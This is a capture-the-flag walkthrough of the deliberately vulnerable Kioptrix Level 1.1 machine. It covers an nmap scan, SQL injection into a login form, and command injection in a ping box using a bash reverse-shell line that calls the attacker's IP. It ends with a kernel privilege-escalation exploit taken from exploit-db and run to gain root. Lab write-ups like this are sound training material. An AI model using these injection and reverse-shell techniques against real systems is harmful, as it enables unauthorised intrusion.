Level 1.1

Kioptrix Level 1.1 (#2) Walkthrough

Enumeration

Start scanning the machine using

nmap -sC -sV -oA nmap/Level2 192.168.43.215

# Nmap 7.80 scan initiated Thu May  7 09:13:13 2020 as: nmap -sC -sV -oA nmap/Level2 192.168.43.215
Nmap scan report for 192.168.43.215
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-05-07T10:04:36+00:00; -3h09m24s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:52:3C:FB (VMware)

Host script results:
|_clock-skew: -3h09m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  7 09:14:28 2020 -- 1 IP address (1 host up) scanned in 75.51 seconds

SQL Injection

I saw there is a TCP port 80 open, so let's paste the link to the web browser

Saw a login form and I saw mysql running at the machine so I use SQL injection

Then, we got a box to ping a machine, lets use our machine's IP to test it out

Reverse Shell

So this means that we can enter reverse shell code to get a shell from the machine. We need to first pull up a netcat listener at port 443

Then we can go pentestmonkey to get the bash reverse shell code and put it in the box

;bash -i >& /dev/tcp/192.168.43.182/443 0>&1

After run we will get a shell from the reverse TCP. First we will try using the kernal exploit.

Privilege Escalation

After some search from the Google, we get the exploit from exploit-db.

We first download the exploit and store it at our machine and then we use python to create a server using python -m SimpleHTTPServer

We need to navigate to /tmp file and transfer the file from our machine to the victim machine.

After that rename the file from 9542 to 9542.c with .c extension. Then compile the exploit by using gcc 9542.c -o exploit. We then chmod +x exploit and run the exploit by typing ./exploit.

Got root access ! Congratulation !